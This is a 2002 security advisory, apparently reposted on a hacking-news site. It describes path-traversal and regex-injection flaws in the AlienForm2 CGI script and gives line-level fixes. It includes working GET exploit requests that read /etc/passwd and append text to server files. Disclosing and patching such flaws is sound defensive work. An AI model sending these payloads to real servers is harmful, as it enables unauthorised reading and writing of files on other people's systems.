Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » AlienForm2 revision 1.5

AlienForm2 revision 1.5

by Nikola Strahija on June 11th, 2002 AlienForm2 by Jon Hedley is a template driven form processing Perl CGI script. It is normally installed as af.cgi or alienform.cgi. Template files on the server are used to configure the format of the output document, the name of a log file and the format of the data to append to the log file.


AlienForm2 is published under a licence that does not allow me to
reproduce parts of it here without permission, which I have been
unable to obtain. This advisory is best read in conjunction with a
copy of af.cgi.

The paths to the template files come from CGI inputs, and a flaw in
the code that cleans up those inputs allows any file on the server to
be used as a template file. The cleanup code replaces bad characters
and constructs with the empty string, and the input string ".|./" is
transformed by the cleanup code to "../".

The path cleanup code can be found on lines 185, 186, 197 and 198 of
af.cgi.

The name of a CGI input in square brackets in a template is replaced
with the value of that input. The regular expression which performs
the replacement is not resilient to regular expression metacharacters
in the name of a CGI input, allowing an attacker to take full control
of the contents of a template after CGI input substitution.

The CGI input substitution code can be found on line 246 of af.cgi.


Suggested Fix
=============

On lines 185 and 197, change [] to [_]

On lines 186 and 198, change // to /_/

On lines 246 and 248, change $key to Q$keyE


Exploits
========

Arbitrary file disclosure:

GET /cgi-bin/af.cgi?_browser_out=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F
.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Fetc%2Fpasswd

File writing:

This proof of concept exploit appends the text "hello there" to the
file /tmp/foo on the web server. It requires the existence of the
file /tmp/passwd, consisting of just the three lines:

root:*:0:0:Charlie &:/root:/bin/csh
httpd:*:1004:1004:Apache daemon:/:/nonexistent
nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin

This exploit can be readily adapted to use any other file of two or
more lines in place of /tmp/passwd, and the file disclosure
vulnerability could be used to find a suitable file. That process
could be automated.

GET /cgi-bin/af.cgi?_out_file=.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.
%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Ftmp%2Fpasswd&x9|^root.*|x9=.|.%2F.|.
%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2F.|.%2Ftmp%2Ffoo&x9|^http
d.*|x9=hello+there&x9|^nobody.*%0A|x9=

=====================================================================

--
Nick Cleaton
[email protected]


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »